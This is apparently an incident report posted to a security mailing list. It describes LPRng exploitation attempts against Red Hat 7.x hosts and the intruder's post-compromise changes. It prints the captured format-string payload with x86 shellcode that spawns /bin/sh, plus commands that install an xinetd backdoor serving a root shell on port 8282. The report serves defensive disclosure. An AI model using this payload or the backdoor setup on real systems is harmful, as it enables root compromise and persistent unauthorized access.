LPRng exploits

[Kathy Bergsma <kathya () nersp nerdc ufl edu>]

Port 515 on our network was scanned from uiowa.edu over the weekend.
Here's some information on the LPRng exploits attempted against several
RedHat Linus 7.x hosts.  The intruder attempts to create a file called
/dev/whoa/reg.  It looks like they intend for reg to open port 8282 with
root privileges.  They then edit xinetd.conf file and restart xinetd to
open the port.  Evidence of these changes was cleared from compromised
hosts once the intruder installed his kit.  A password protected guest
account with a GID of 0 was created on one compromised host.  The
following files were also changed:  du, find, ls, netstat, passwd, ping,
psr, and su.

Shown below is session data from the exploit.  Shown first is the format
string used execute a root shell.  Shown after that are the commands
executed from the shell.

--
Kathy Bergsma
Network Security Coordinator


BB{E0}{F3}{FF}{BF}{E1}{F3}{FF}{BF}{E2}{F3}{FF}{BF}{E3}{F3}{FF}{BF}XXXXXXXXXXXXXXXXXX%.160u%300$n%.17u%301$nse
curity%302$n%.192u%303$n{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}
{B2}f{89}{D0}1{C9}{89}{CB}C{89}]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}E{EE}{F}'{89}M{F0}
{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}?{89}{D0}{CD}
{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}
/bin/sh{A}


mkdir /dev/whoa ; echo "service reg"  >  > /dev/whoa/reg ; echo "{"  >
> /dev/whoa/reg; echo "socket_type = stream"
>  >  /dev/whoa/reg;{D}{A}
echo "port = 8282"  >  > /dev/whoa/reg; echo "protocol = tcp"  >  >
/dev/whoa/reg; echo "wait = no"  >  > /dev/whoa/reg;{D}{A}
echo "user = root"  >  > /dev/whoa/reg ; echo "server = /bin/sh"  >  >
/dev/whoa/reg ; echo "server_args = -i"  >  >  /dev/whoa/reg;{D}
{A}
echo "}"  >  > /dev/whoa/reg ; echo "includedir /dev/whoa"  >  >
/etc/xinetd.conf ; nohup /etc/rc.d/init.d/xinetd restart  >  > /dev
/null 2 >  > /dev/null;{D}{A}